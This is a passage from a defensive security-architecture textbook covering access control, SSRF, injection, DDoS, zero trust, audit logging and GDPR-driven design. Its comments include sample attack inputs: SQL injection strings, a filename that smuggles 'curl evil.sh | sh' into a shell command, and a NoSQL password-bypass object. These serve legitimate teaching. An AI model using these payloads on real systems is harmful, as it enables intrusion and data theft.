# BROKEN ACCESS CONTROL -- the most common and most preventable class.
# The bug is not that authentication is missing; it is that authorization
# checks the USER but not the OBJECT.
# WRONG: authenticated, but any authenticated user can read any order (IDOR)
def get_order_broken(order_id, current_user, db):
return db.query("SELECT * FROM orders WHERE id = %s", (order_id,))
# RIGHT: ownership is part of the query, so a mismatch returns nothing
def get_order(order_id, current_user, db):
row = db.query(
"SELECT * FROM orders WHERE id = %s AND customer_id = %s",
(order_id, current_user.id), # scope to the caller, in SQL
)
if not row:
# Return 404, not 403: a 403 confirms the object exists, which leaks
# information an attacker can enumerate.
raise NotFound()
return row
# SSRF -- the server is tricked into being the attacker's HTTP client.
import ipaddress, socket
from urllib.parse import urlparse
ALLOWED_HOSTS = {"api.partner.com", "cdn.example.com"}
def safe_fetch(url: str):
parsed = urlparse(url)
if parsed.scheme not in ("https",): # no file://, no gopher://
raise ValueError("scheme not allowed")
if parsed.hostname not in ALLOWED_HOSTS: # allowlist beats blocklist
raise ValueError("host not allowed")
# Resolve and check the ADDRESS: a permitted hostname can still resolve to
# a private range (DNS rebinding, or a malicious partner DNS record).
ip = ipaddress.ip_address(socket.gethostbyname(parsed.hostname))
if ip.is_private or ip.is_loopback or ip.is_link_local:
raise ValueError("resolves to an internal address")
# 169.254.169.254 is the cloud metadata service -- the classic SSRF
# target, because it hands out instance credentials.
return requests.get(url, timeout=5, allow_redirects=False)
# ^ a redirect can bypass every check above
Two structural lessons matter more than the individual entries. Most items are design and process failures, not coding mistakes — insecure design, security misconfiguration, vulnerable components, and logging failures are all decided outside the function being written. And the list changes slowly, which tells you these are not novel attacks being discovered but well-understood ones being repeated; the gap is in systematic application, not in knowledge.
Key Takeaways
- Broken access control is consistently the top risk: authenticate the user, then authorize the specific object on every request, server-side.
- Return 404 rather than 403 for objects the caller may not see, to avoid confirming their existence.
- SSRF defence needs an egress allowlist plus post-resolution IP checks and no automatic redirect following; the cloud metadata endpoint is the usual target.
- Most Top 10 entries are design, configuration, and process failures rather than coding errors.
- The list is stable over time — the gap is systematic application, not new knowledge.
🧪 Practice
- Audit three endpoints in a codebase for object-level authorization and fix any that check only authentication.
- Implement an SSRF-safe fetch helper and test it against a hostname that resolves to a private address.
- Interview: Why is broken access control the most common serious vulnerability? (Hint: think about what a framework gives you automatically versus what must be written per endpoint and per object.)
Injection and Input Validation
Injection happens when untrusted input is interpreted as code rather than data. The pattern is identical across SQL, shell commands, LDAP, XPath, and template engines: a string is assembled from a trusted template plus untrusted values, and the interpreter cannot tell which part came from where.
The correct fix is almost never "escape the input". Escaping is a per-context guess that must be right every time; separating code from data is a structural guarantee that is right by construction. Parameterized queries send the SQL and the values over different channels, so the database parses the query first and then binds values as opaque data — a value can never become syntax.
# ---- SQL: the difference is structural, not cosmetic -----------------------
# VULNERABLE: the value becomes part of the query text
def find_user_bad(email, db):
return db.execute(f"SELECT * FROM users WHERE email = '{email}'")
# email = "x' OR '1'='1" -> returns every user
# email = "x'; DROP TABLE users; --" -> exactly what you think
# SAFE: the query is parsed BEFORE the value is bound; the value is never syntax
def find_user(email, db):
return db.execute("SELECT * FROM users WHERE email = %s", (email,))
# Identifiers cannot be parameterized -- so use an allowlist, never interpolation.
SORTABLE = {"created_at", "total", "status"} # a fixed, known set
def list_orders(sort_by, direction, db):
if sort_by not in SORTABLE:
raise ValueError("invalid sort field")
direction = "DESC" if direction == "desc" else "ASC" # map, do not pass through
return db.execute(f"SELECT * FROM orders ORDER BY {sort_by} {direction}")
# ---- Shell: do not build a command string at all ---------------------------
import subprocess, shlex
def convert_bad(filename):
subprocess.run(f"convert {filename} out.png", shell=True) # shell parses it
# filename = "a.jpg; curl evil.sh | sh" -> remote code execution
def convert(filename):
# No shell: the argument list is passed to execve directly, so ';' and '|'
# are ordinary characters in a filename, not operators.
subprocess.run(["convert", filename, "out.png"], shell=False, check=True)
# ---- NoSQL: injection does not require SQL ---------------------------------
def login_bad(collection, username, password_json):
# If password_json comes from a JSON body, an attacker sends
# {"username": "admin", "password": {"$ne": null}}
# and the operator object matches any password.
return collection.find_one({"username": username, "password": password_json})
def login(collection, username, password):
if not isinstance(password, str): # reject non-scalar types outright
raise ValueError("invalid password")
return collection.find_one({"username": username, "password": password})
Validation is the second layer, and its rules are worth stating precisely. Allowlist, do not blocklist — enumerate what is acceptable, because you cannot enumerate everything an attacker might send. Validate at the trust boundary, once, on the server, and treat every client-side check as a UX feature with no security value. Validate type, range, length, and format, since an unbounded string is both an injection vector and a denial-of-service one.
from pydantic import BaseModel, EmailStr, Field, field_validator
class CreateOrder(BaseModel):
# A schema is an allowlist: unknown fields are rejected, types are coerced
# or refused, and bounds are enforced before any business code runs.
customer_email: EmailStr
quantity: int = Field(ge=1, le=100) # range bounds, not just type
sku: str = Field(pattern=r"^[A-Z0-9\-]{3,20}$") # format allowlist
note: str = Field(max_length=500, default="") # length caps memory use
@field_validator("note")
@classmethod
def no_control_chars(cls, v):
if any(ord(c) < 32 and c not in "\n\t" for c in v):
raise ValueError("control characters not allowed")
return v
model_config = {"extra": "forbid"} # reject unexpected fields -- mass
# assignment is an injection cousin
Output encoding is the third layer and applies to a different direction: data leaving your system into another interpreter. Cross-site scripting is injection into HTML, and the defence is context-aware encoding — HTML body, attribute, JavaScript, and URL contexts each require different escaping, which is why template engines that auto-escape by context are strongly preferred over manual escaping. A Content Security Policy then limits the damage if one slips through.
Key Takeaways
- Injection is untrusted input being interpreted as code; the fix is separating code from data structurally, not escaping.
- Use parameterized queries always; for identifiers that cannot be parameterized, map against a fixed allowlist.
- Avoid
shell=True— pass an argument list so shell metacharacters stay data.- Validate at the server-side trust boundary with an allowlist schema covering type, range, length, and format, and reject unknown fields.
- Encode output per context and add CSP; XSS is injection into the browser's interpreter.
🧪 Practice
- Find a dynamically built query in a codebase and convert it to parameters, including any sortable-column handling.
- Write a request schema with strict bounds and unknown-field rejection, then test it against oversized, wrongly typed, and extra-field payloads.
- Interview: Can parameterized queries prevent all SQL injection? (Hint: think about which parts of a query accept parameters and which do not.)
DDoS Mitigation
A distributed denial-of-service attack aims to exhaust a resource — bandwidth, connections, CPU, or a downstream dependency — so legitimate users cannot be served. It differs from other attacks in that the traffic may be individually legitimate; the harm is in the volume, which makes "block the bad requests" insufficient as a strategy.
Attacks fall into layers, and the layer determines who can defend.
| Layer | Example | Where it is stopped |
|---|---|---|
| Volumetric (L3/L4) | UDP amplification saturating the link | Upstream provider / scrubbing centre |
| Protocol (L4) | SYN flood exhausting connection tables | Edge network, SYN cookies |
| Application (L7) | Many valid-looking requests to a costly endpoint | Your application and WAF |
| Asymmetric / logic | One request causing enormous work | Application design |
The critical insight for architects is that volumetric attacks cannot be absorbed by your application — if the attack saturates your uplink, nothing running behind it matters. Those require upstream capacity: a CDN or scrubbing provider with far more bandwidth than the attacker. What you can design against is the application layer, and especially the asymmetric case where a small request triggers large work.
# ASYMMETRIC COST is the vulnerability your own design creates.
ENDPOINT_COST = {
"GET /health": 1,
"GET /products": 10,
"GET /search?q=": 200, # full-text search
"POST /reports/generate": 5000, # aggregates months of data
"POST /password-reset": 300, # sends email + hashes a token
}
# An attacker only needs 20 requests/second to /reports/generate to consume
# what 10,000 requests/second to /health would. Rate limiting by REQUEST COUNT
# treats those as equal, which is why cost-based limits exist.
class CostLimiter:
def __init__(self, budget_per_min): self.budget = budget_per_min
def check(self, client_id, endpoint, usage):
cost = ENDPOINT_COST.get(endpoint, 10)
if usage.spend(client_id, cost) > self.budget:
raise RateLimited(retry_after=60)
# Expensive endpoints also deserve: authentication, a queue rather than
# synchronous execution, and results cached by parameters.
# Layered edge defences: each one targets a different exhaustion mode.
limit_req_zone $binary_remote_addr zone=general:10m rate=10r/s;
limit_req_zone $binary_remote_addr zone=expensive:10m rate=1r/m;
limit_conn_zone $binary_remote_addr zone=perip:10m;
server {
limit_conn perip 20; # cap concurrent connections per IP
client_body_timeout 10s; # defeats slowloris-style slow-send attacks
client_header_timeout 10s;
client_max_body_size 1m; # bound memory per request
location /api/ {
limit_req zone=general burst=20 nodelay; # allow bursts, cap sustained
proxy_pass http://backend;
}
location /api/reports/ {
limit_req zone=expensive burst=2; # strict: costly endpoint
proxy_pass http://backend;
}
}
The defence in depth that works in practice, from outside in: anycast plus a CDN so attack traffic is absorbed across many points of presence and cached content never reaches origin; a WAF for signature and behaviour-based filtering; rate limiting by identity where possible (an API key or account is far harder to rotate than an IP address); cost-aware limits on expensive endpoints; autoscaling with a spending cap so elasticity absorbs a spike without becoming a financial denial of service; and graceful degradation — shedding optional features to keep the core path alive, as covered in 9.2.
Two frequently missed points. Legitimate traffic spikes look identical to attacks — a product launch, a viral post, a misconfigured client retrying in a loop — so mitigation must degrade rather than block outright wherever possible. And your dependencies are part of your attack surface: an endpoint that calls a third-party API on every request lets an attacker exhaust your quota there instead, which no amount of local capacity fixes.
Key Takeaways
- Volumetric attacks must be absorbed upstream (CDN, anycast, scrubbing); your application cannot defend a saturated link.
- Application-layer attacks exploit asymmetric cost — rate limit by cost, not by request count.
- Layer defences: CDN, WAF, connection and body limits, identity-based rate limits, autoscaling with a spend cap, graceful degradation.
- Prefer limiting by account or API key over IP address, which attackers rotate cheaply.
- Spikes from real users look like attacks; degrade rather than hard-block, and remember that third-party quotas can be exhausted through you.
🧪 Practice
- Assign a cost weight to each endpoint in an API and design a budget-based rate limiter around them.
- Configure connection, body-size, and timeout limits at a reverse proxy and explain which attack each one addresses.
- Interview: Traffic increases 50x in one minute. How do you tell an attack from a successful marketing campaign, and does your response differ? (Hint: think about distribution of sources, request mix, and what the cost of being wrong is in each direction.)
Zero Trust Architecture
Zero trust discards the assumption that location implies trust. The traditional model was a hardened perimeter with a soft interior: get past the firewall or onto the VPN and you were trusted. That model fails against three realities — attackers get in through phishing and supply chains, employees work from everywhere, and workloads run in shared cloud infrastructure — after which "inside the network" describes the attacker as accurately as the employee.
The zero trust principle is: never trust, always verify. Every request is authenticated and authorized on its own merits regardless of origin, access is granted per resource with least privilege, and the system assumes breach — it is designed so that compromising one component yields as little as possible.
PERIMETER MODEL ZERO TRUST
internet every request, wherever it comes from:
| 1. authenticate the identity
[ firewall / VPN ] <-- the wall (user AND device AND workload)
| 2. evaluate context
================ trusted zone ===== (device posture, location, risk)
[app] [app] [db] [admin] [wiki] 3. authorize this specific resource
all mutually reachable 4. grant least privilege, short TTL
one phished laptop = full access 5. log everything; re-evaluate often
trust = network position trust = a per-request decision
# A policy decision point: every access is a fresh decision over live signals.
def authorize(request, identity, device, resource, risk_engine):
# 1. Identity is proven cryptographically, not assumed from the network.
if not identity.verified:
return Deny("unauthenticated")
# 2. Device posture matters as much as identity: a valid user on a
# jailbroken, unpatched device is a compromised session waiting to happen.
if not (device.managed and device.disk_encrypted
and device.os_patch_age_days < 30):
return Deny("device posture")
# 3. Context and risk, evaluated now -- not at login an hour ago.
risk = risk_engine.score(identity, device, request) # impossible travel,
if risk > 0.8: # new device, odd hours
return Deny("risk score")
if risk > 0.5 and resource.sensitivity == "high":
return StepUp("mfa_required") # challenge rather than block
# 4. Least privilege on the SPECIFIC resource, not on a network segment.
if not policy.permits(identity, resource, request.action):
return Deny("not permitted")
# 5. Short-lived grant: the decision expires and must be made again.
return Allow(ttl_seconds=300, scope=[f"{resource.id}:{request.action}"])
The architectural components that implement it: a strong identity provider with phishing-resistant MFA (11.1); device attestation; microsegmentation so workloads can only reach what they need rather than the whole subnet; mTLS for workload identity; a policy engine that makes decisions centrally and enforces them at each service; and comprehensive logging, because "assume breach" means detection matters as much as prevention.
The honest caveats: zero trust is a multi-year programme rather than a product, and the vendor conflation of the term with any single tool is unhelpful. It introduces a hard dependency on the identity and policy infrastructure, which must then be engineered for very high availability. And it can degrade user experience if step-up challenges are tuned badly — the goal is more frequent verification, not more frequent interruption.
The practical adoption path is incremental: start with identity and MFA everywhere, remove implicit trust from internal service calls by requiring mTLS or tokens, segment the highest-value systems first, and replace VPN-wide access with per-application access.
Key Takeaways
- Zero trust removes network location as a basis for trust: every request is authenticated and authorized on its own merits.
- It assumes breach, so least privilege, short-lived grants, and segmentation limit what one compromise yields.
- Decisions consider identity, device posture, and contextual risk, and are re-evaluated continuously rather than once at login.
- Microsegmentation and workload identity (mTLS) replace flat internal networks.
- It is a programme, not a product; adopt incrementally and engineer the identity and policy plane for very high availability.
🧪 Practice
- Take an internal service reachable by anything in the VPC and write the policy that limits it to two named callers and two endpoints.
- Design a step-up authentication rule that triggers only on high-sensitivity actions from unrecognized devices.
- Interview: A company says "we bought a zero trust product". What questions do you ask? (Hint: think about the components that must exist — identity, device posture, policy, segmentation, logging — and which a single product can plausibly cover.)
Defense in Depth
Defence in depth means layering independent controls so that no single failure results in compromise. It exists because every individual control fails: WAF rules have gaps, patches lag disclosure, people get phished, and a library you depend on ships a backdoor. Designing as though each control might fail is the only realistic posture.
The analogy is a medieval castle — moat, wall, gatehouse, keep — but the useful version adds a condition that the analogy hides: the layers must be independent. Three controls that all depend on the same identity provider, or all rely on the same network assumption, are one control drawn three times. Their combined effect only multiplies when their failure modes are unrelated.
LAYERS AROUND A SENSITIVE OPERATION (a fund transfer)
network WAF, rate limits, DDoS absorption
|
identity MFA at login; step-up re-auth for this action
|
authorization object-level check: is this the caller's account?
|
application input validation; amount and velocity limits
|
data encrypted at rest; field-level for the account number
|
operational full audit trail; anomaly alerting; asynchronous review
|
recovery reversible for N hours; tested restore path
An attacker with a stolen session still faces step-up auth, velocity limits,
anomaly detection, and reversibility. No single bypass is sufficient.
# Layered controls on one operation. Each is independently sufficient to stop
# a class of attack, and each assumes the others may have failed.
def transfer_funds(request, ctx):
# L1 identity: recent, strong authentication for a sensitive action
if ctx.session.age_seconds > 300 or not ctx.session.mfa_verified:
raise StepUpRequired()
# L2 authorization: the object must belong to the caller
account = ctx.db.get_account(request.from_account)
if account.owner_id != ctx.user.id:
raise NotFound() # not 403: do not confirm existence
# L3 validation: bounds that make an exploit less useful even if reached
if not (0 < request.amount <= account.transfer_limit):
raise ValueError("amount out of range")
# L4 velocity: limits the damage of a fully compromised session
if ctx.velocity.sum_last_24h(ctx.user.id) + request.amount > account.daily_limit:
raise LimitExceeded()
# L5 anomaly: new payee + unusual amount + new device -> hold for review
if ctx.risk.score(request, ctx.user) > 0.7:
return ctx.queue_for_review(request) # degrade, do not silently allow
# L6 audit: an immutable record regardless of outcome
ctx.audit.write("transfer", user=ctx.user.id, amount=request.amount,
to=request.to_account, ip=ctx.ip, device=ctx.device_id)
return ctx.execute_transfer(request)
Two supporting principles are usually discussed alongside it. Fail secure: on error, deny. An authorization service timeout must not result in access being granted, which is a real and recurring bug — it usually arrives as a well-intentioned "don't let the auth service outage break the product" change. Least privilege at every layer: each component gets only the access it needs, so a compromise yields the smallest possible foothold.
| Layer | Control examples | Fails when... |
|---|---|---|
| Network | Segmentation, firewalls, DDoS absorption | The attacker is already inside |
| Host | Patching, hardened images, EDR | A zero-day is used |
| Application | Validation, authorization, CSRF/XSS defences | There is a logic flaw |
| Data | Encryption, tokenization, masking | The app credential is stolen |
| Identity | MFA, short sessions, step-up auth | A session token is stolen |
| Operational | Audit logs, alerting, anomaly detection | Nobody reads the alerts |
| Recovery | Backups, reversibility, incident response | Restore was never tested |
The cost side deserves honesty: layers add latency, complexity, and operational burden, and a control nobody maintains is worse than none because it produces false confidence. Weight the layers toward the highest-value assets rather than applying everything uniformly.
Key Takeaways
- Layer independent controls so that no single failure causes compromise; every control fails eventually.
- Independence is the requirement — controls sharing a failure mode are one control repeated.
- Fail secure: errors and timeouts in authorization must deny, never allow.
- Apply least privilege at every layer so a compromise yields the smallest possible foothold.
- Weight layers toward high-value assets; unmaintained controls create false confidence.
🧪 Practice
- Pick a sensitive operation in a system you know and enumerate the layers protecting it; identify any two that share a failure mode.
- Find a code path where a dependency failure results in permitting an action, and convert it to fail secure.
- Interview: Is more security always better? (Hint: think about latency, the cost of maintaining controls, user behaviour under friction, and what happens to a control nobody owns.)
Audit Logging
An audit log is an immutable record of security-relevant events: who did what, to what, when, and from where. It differs from application logging in purpose and therefore in design. Application logs exist to debug behaviour and can be sampled, rewritten, and discarded. Audit logs exist to answer questions after an incident and to satisfy regulators, so they must be complete, tamper-evident, and retained.
The requirement that drives the design is that you cannot investigate what you did not record. A breach discovered three months later is investigated entirely through logs; if reads were not logged, "what did the attacker access?" has no answer, and in most regulatory regimes an unanswerable question means you must notify everyone.
import json, hmac, hashlib, time
# ---- What an audit event must contain --------------------------------------
def audit_event(actor, action, resource, outcome, ctx, before=None, after=None):
return {
"timestamp": time.time_ns(), # high resolution, and one clock source
"actor": { # WHO -- the authenticated subject
"id": actor.id, "type": actor.type, # user | service | system
"auth_method": actor.auth_method, # password+mfa, mtls, api_key
"on_behalf_of": actor.impersonating, # admin acting as a user
},
"action": action, # WHAT -- verb, from a fixed set
"resource": { # TO WHAT -- specific object
"type": resource.type, "id": resource.id,
"classification": resource.classification,
},
"outcome": outcome, # success | denied | error
"context": { # FROM WHERE
"ip": ctx.ip, "user_agent": ctx.user_agent,
"request_id": ctx.request_id, # correlates with app logs/traces
"session_id": ctx.session_id,
},
"changes": {"before": before, "after": after}, # for mutations
}
# Note what is absent: the DATA itself. An audit log recording the value of
# a field it protects becomes a second copy of the sensitive data.
# ---- Tamper evidence: hash chaining ----------------------------------------
def append(event, prev_hash, hmac_key, store):
body = json.dumps(event, sort_keys=True)
# Each entry commits to the previous one, so deleting or editing any entry
# breaks the chain for every entry after it.
digest = hmac.new(hmac_key, (prev_hash + body).encode(), hashlib.sha256).hexdigest()
store.append({"event": body, "prev": prev_hash, "hash": digest})
return digest
def verify_chain(entries, hmac_key):
prev = "0" * 64
for e in entries:
expected = hmac.new(hmac_key, (prev + e["event"]).encode(),
hashlib.sha256).hexdigest()
if expected != e["hash"]:
return False, e # first tampered or missing entry
prev = e["hash"]
return True, None
What must be logged, at minimum: authentication attempts (success and failure), authorization denials, access to sensitive data — reads included — all administrative actions, privilege and permission changes, configuration changes, and key or secret operations. Reads are the entry most often skipped and the one most often needed.
| Property | Requirement | Why |
|---|---|---|
| Immutable | Append-only; WORM storage | An attacker's first move is the logs |
| Tamper-evident | Hash chain or signatures | Detect deletion and modification |
| Separate | Different account/system from the app | App compromise must not grant log write |
| Complete | Includes reads and denials | Scope the breach; prove non-access |
| Time-synced | NTP; a single timezone (UTC) | Correlate across systems |
| Retained | Per regulation (often 1–7 years) | Investigations start late |
| Monitored | Alerts on the patterns that matter | An unread log prevents nothing |
| Privacy-aware | References, not copies, of sensitive data | Do not duplicate what you protect |
The most important architectural detail is separation: audit logs must be written to a system the application cannot modify — a different account, a different trust domain, append-only storage — because a compromised application that can erase its own audit trail provides no assurance at all. Streaming to a separate SIEM or immutable store, with write-only credentials on the application side, is the standard shape.
Key Takeaways
- Audit logs answer who did what to what, when, and from where; they are for investigation and compliance, not debugging.
- Log reads and denials, not just writes — otherwise you cannot scope a breach.
- Store them in a system the application cannot modify, append-only, with write-only credentials on the app side.
- Make them tamper-evident with hash chaining or signatures, and verify the chain periodically.
- Reference sensitive data rather than copying it, keep clocks synchronized in UTC, and alert on the patterns that matter — an unread log prevents nothing.
🧪 Practice
- Define the audit event schema for a healthcare record system, including what a read event must and must not contain.
- Implement hash chaining over an append-only log and demonstrate that editing one middle entry is detected.
- Interview: An attacker had access for three months. How do you determine what they accessed? (Hint: think about which events would need to have been logged before the incident, and what you would have to assume in their absence.)
<a id="114-privacy-and-regulatory-design"></a>
11.4 Privacy and Regulatory Design
Privacy regulation converts questions that used to be product preferences into architectural constraints: what you may collect, where it may be stored, how long you may keep it, and what you must be able to do on demand. This subchapter covers how to classify data, the residency and erasure requirements that reshape storage design, and how to build compliance in rather than bolt it on.
Data Classification
Every privacy and security control depends on knowing what data you hold and how sensitive it is. Without classification, protection is applied uniformly — which in practice means the highest standard is too expensive to apply everywhere, so the lowest standard is applied to everything, including the data that matters.
Classification assigns each data element a level, and each level carries mandatory handling requirements. The point is that the level does the deciding: an engineer adding a field does not judge how to protect it, they label it, and the label determines encryption, retention, access, and whether it may leave a region.
| Level | Examples | Handling requirement |
|---|---|---|
| Public | Marketing pages, published docs | No restriction; integrity still matters |
| Internal | Runbooks, non-sensitive metrics | Authenticated access only |
| Confidential | Customer names, emails, order history | Encrypted at rest, RBAC, audit reads |
| Restricted | Payment data, health data, national IDs | Field-level encryption or tokenization, MFA, full audit, residency limits |
# Classification as code: the schema declares sensitivity, and the platform
# derives the controls. Labels in a wiki drift; labels in the schema do not.
from dataclasses import dataclass, field, fields
@dataclass
class Column:
name: str
classification: str # public | internal | confidential | restricted
pii: bool = False
purpose: str = "" # why it is collected -- required by GDPR
retention_days: int | None = None
residency: str | None = None # "eu-only" | None
CUSTOMER_SCHEMA = [
Column("id", "internal", purpose="identifier"),
Column("email", "confidential", pii=True, purpose="account_login",
retention_days=2555), # 7 years
Column("full_name", "confidential", pii=True, purpose="fulfilment",
retention_days=2555),
Column("national_id", "restricted", pii=True, purpose="tax_reporting",
retention_days=3650, residency="eu-only"),
Column("last_login_ip","confidential", pii=True, purpose="fraud_detection",
retention_days=90), # short: minimize
Column("signup_source","internal", purpose="analytics", retention_days=730),
]
# Controls are DERIVED, not decided per field by whoever writes the migration.
CONTROLS = {
"public": {"encrypt_at_rest": False, "audit_reads": False},
"internal": {"encrypt_at_rest": True, "audit_reads": False},
"confidential": {"encrypt_at_rest": True, "audit_reads": True, "mask_in_logs": True},
"restricted": {"encrypt_at_rest": True, "audit_reads": True, "mask_in_logs": True,
"field_encryption": True, "mfa_required": True},
}
def required_controls(col: Column) -> dict:
return CONTROLS[col.classification]
def ci_check(schema):
# Fails the build if a PII column has no purpose or no retention -- both are
# legal requirements, and both are easy to forget in a rushed migration.
problems = [c.name for c in schema
if c.pii and (not c.purpose or c.retention_days is None)]
assert not problems, f"PII columns missing purpose/retention: {problems}"
Two related ideas complete the picture. A data inventory (or record of processing activities, which GDPR requires) maps what you hold, where it lives, why, on what legal basis, and who it is shared with. Building it manually is a losing game against a changing codebase, which is why deriving it from annotated schemas is the approach that survives.
Data lineage tracks how classified data propagates. A restricted field copied into an analytics warehouse, a cache, a search index, or a log line carries its classification with it — and this is where most compliance failures happen, not in the primary database that everyone remembers to protect. The practical test: for any sensitive field, can you enumerate every system it reaches? If not, you cannot honestly answer a deletion request or a breach-scope question.
Key Takeaways
- Classification lets you apply proportionate controls instead of a uniform standard that ends up being the weakest one.
- Encode classification in the schema so controls are derived automatically and cannot drift from a wiki page.
- Require purpose and retention for every PII field, and enforce it in CI.
- Maintain a data inventory derived from annotated schemas rather than maintained by hand.
- Track lineage: copies in warehouses, caches, indexes, and logs carry the same classification, and that is where failures concentrate.
🧪 Practice
- Classify every column of a table you work with and list which currently lack the controls their level requires.
- Write a CI check that fails when a new PII column is added without a purpose and a retention period.
- Interview: How do you know where a customer's email address exists in your systems? (Hint: think about what would have to be true at design time for that question to be answerable in minutes rather than weeks.)
Data Residency and Sovereignty
Data residency requirements dictate where data may be physically stored and processed. They arise from national law, sector regulation, and contractual commitments to customers, and they are architectural rather than operational: a system designed to store everything in one region cannot satisfy them without substantial rework.
The distinction worth keeping straight: residency is where data sits; sovereignty is whose laws apply to it — which can differ, since a provider headquartered in one country may be legally compelled to produce data stored in another. That is why some requirements go beyond "store it in region X" to "store it in region X, operated by an entity subject only to X's law".
SINGLE REGION REGIONAL PARTITIONING
all users -> [ us-east ] EU users -> [ eu-central ] -+
| US users -> [ us-east ] |
one database |
each region: full stack, |
simple, cheap own database, own keys |
fails EU/India/China rules v
shared globally: only non-personal
reference data (catalog, config)
The hard part is not the split. It is everything global that assumed one
database: analytics, search, ML training, support tooling, and backups.
# Region routing must happen before any data is written, at the edge, and it
# must be derived from a stored attribute rather than guessed per request.
REGION_OF = {"DE": "eu-central", "FR": "eu-central", "IT": "eu-central",
"US": "us-east", "CA": "us-east",
"IN": "ap-south"} # India: local storage rules
def route(user, request):
# The user's home region is decided once, at signup, and stored. Routing on
# request IP would move a traveller's data across a legal boundary.
region = user.home_region or REGION_OF.get(request.signup_country, "us-east")
return f"https://{region}.api.example.com"
def assert_write_allowed(record, target_region, schema):
# A guard rail in the data layer: a restricted, residency-tagged field can
# never be written outside its permitted region, even by a bug in a job.
for col in schema:
if col.residency == "eu-only" and not target_region.startswith("eu-"):
if record.get(col.name) is not None:
raise ResidencyViolation(f"{col.name} -> {target_region}")
# Cross-region aggregation without moving personal data:
def global_metrics(regions):
# Each region computes aggregates LOCALLY and exports only anonymous counts.
# The personal data never crosses the boundary; the numbers do.
totals = {}
for r in regions:
for metric, value in r.export_aggregates(min_cohort=50).items():
totals[metric] = totals.get(metric, 0) + value # k-anonymity floor
return totals
The consequences ripple much further than the primary database, and enumerating them early is what separates a workable design from a painful retrofit:
- Backups and disaster recovery must stay in-region, which means a region-local DR strategy rather than a single global one.
- Analytics and ML cannot simply pool everything; either aggregate locally and combine anonymized results, or train per region.
- Support tooling must respect the boundary — a support agent in one region viewing another region's customer records is a transfer.
- Logs and traces routinely contain personal data and routinely ship to a central observability stack, which is one of the most common accidental transfers.
- Third-party processors inherit the requirement; a vendor that processes in a different region breaks compliance regardless of your own architecture.
- Cost and latency rise: N regional stacks cost more than one, and any genuinely global feature becomes a cross-region problem.
| Approach | What it gives | Cost |
|---|---|---|
| Full regional stacks | Strongest compliance story | N deployments, N pipelines |
| Regional data, global compute | Simpler ops | Processing may itself be regulated |
| Global with field encryption | One deployment; keys held regionally | Acceptable only under some regimes |
| Single region + consent | Simplest | Not viable in many jurisdictions |
The design guidance that follows: partition by region from the start if you have any plausible international ambition, keep the region an explicit attribute of every account rather than inferring it, and make the data layer — not each service — enforce the boundary, so compliance does not depend on every developer remembering.
Key Takeaways
- Residency is where data lives; sovereignty is whose law reaches it, and the two do not always coincide.
- Partitioning by region is an architectural decision that is very expensive to retrofit.
- The hard part is everything global: analytics, search, support tooling, logs, backups, and third-party processors.
- Store the user's home region as an explicit attribute set at signup; never infer it from request IP.
- Enforce residency in the data layer so it does not depend on per-developer discipline, and export only aggregates across boundaries.
🧪 Practice
- Design a regional partitioning scheme for a SaaS with EU and US customers, and list every component that must be duplicated.
- Write a data-layer guard that rejects writes of residency-tagged fields to a non-permitted region, with a test proving a background job cannot bypass it.
- Interview: Your observability stack is in one region and receives logs from all of them. What is the problem? (Hint: think about what routinely ends up in log lines and what crossing a boundary means legally.)
GDPR and Right to Erasure
The GDPR gives individuals a set of rights over their personal data, and each right translates into a technical capability the system must actually have. The architectural point is that these are not reporting requirements satisfied after the fact — several of them are impossible to satisfy unless the system was designed for them.
| Right | What the system must be able to do |
|---|---|
| Access | Produce everything held about a person |
| Rectification | Correct data, and propagate the correction downstream |
| Erasure | Delete, everywhere, including backups and processors |
| Portability | Export in a structured, machine-readable format |
| Restriction | Keep data but stop processing it |
| Object | Stop processing based on legitimate interest |
| Automated decisions | Explain, and allow a human review |
Erasure ("right to be forgotten") is the hardest, because deletion in a modern architecture is not one operation. The same person's data exists in the primary database, read replicas, caches, search indexes, the analytics warehouse, message queues and their retention windows, application logs, backups, and every third-party processor. Deleting a row addresses the first of those.
WHERE ONE PERSON'S DATA ACTUALLY LIVES
[ primary DB ] -- replicas -- [ cache ] -- [ search index ]
| ^
+--> [ event log (7d) ] --> [ warehouse ] -+
| |
+--> [ app logs (30d) ] +--> [ ML training set ]
|
+--> [ backups (90d) ] ------> restorable copies
|
+--> [ processors: email, payments, support desk, analytics ]
A DELETE on the primary reaches exactly one of these boxes.
# Erasure as an orchestrated, auditable workflow -- not a DELETE statement.
class ErasureRequest:
STAGES = [
("verify_identity", "the requester must be proven to be the subject"),
("check_legal_holds", "tax, AML, and litigation obligations can override"),
("primary_delete", "database rows, in a transaction"),
("cascade_stores", "cache, search index, derived tables"),
("purge_streams", "compact/tombstone keyed topics"),
("scrub_analytics", "warehouse rows and any ML feature store"),
("notify_processors", "every third party, with confirmation tracked"),
("schedule_backup_expiry", "backups age out; record the completion date"),
("record_completion", "audit entry: what, when, what was retained"),
]
def erase(subject_id, ctx):
# Legal holds are the common surprise: some data MUST be retained, and the
# lawful answer is partial erasure plus an explanation to the subject.
holds = ctx.legal.holds_for(subject_id) # e.g. invoices: 7 years (tax law)
retained = [h.data_category for h in holds]
ctx.db.execute("DELETE FROM users WHERE id = %s", (subject_id,))
ctx.db.execute("UPDATE orders SET customer_id = NULL, "
" ship_to = NULL WHERE customer_id = %s", (subject_id,))
# ^ anonymize rather than delete where the RECORD must survive
# for accounting but the PERSON need not be identifiable
ctx.cache.delete_pattern(f"user:{subject_id}:*")
ctx.search.delete_document(subject_id)
ctx.warehouse.delete_subject(subject_id)
for p in ctx.processors:
ctx.track(p.name, p.request_erasure(subject_id)) # confirmations matter
# Backups: restoring one to delete one row is usually infeasible, so the
# accepted practice is documented aging-out plus a re-deletion procedure
# applied if a restore ever occurs.
ctx.schedule_reerasure_on_restore(subject_id, until=ctx.backup_horizon())
ctx.audit.write("erasure_completed", subject=subject_id, retained=retained)
return {"status": "completed", "retained_categories": retained}
The design decisions that make all of this tractable:
- Crypto-shredding. Encrypt each subject's data with a per-subject key and destroy the key on erasure. The ciphertext becomes permanently unreadable, which handles append-only stores, event logs, and backups where physical deletion is impractical.
- Centralize the subject identifier. If every store keys personal data by the same subject ID, erasure is a fan-out. If each system invented its own key, finding the data is the hard part.
- Anonymize where records must survive. An invoice must persist for tax law; it does not have to identify the person. Removing identifiers preserves the business record and satisfies the right.
- Log deletion requests as audit events — you must be able to demonstrate compliance, and a deletion with no record is indistinguishable from ignoring it.
Note the deadlines: responses are generally due within one month, which rules out manual processes at any scale. Note also that consent is only one of six lawful bases, and the basis determines which rights apply — erasure obligations differ between data held under consent and data held under a legal obligation.
Key Takeaways
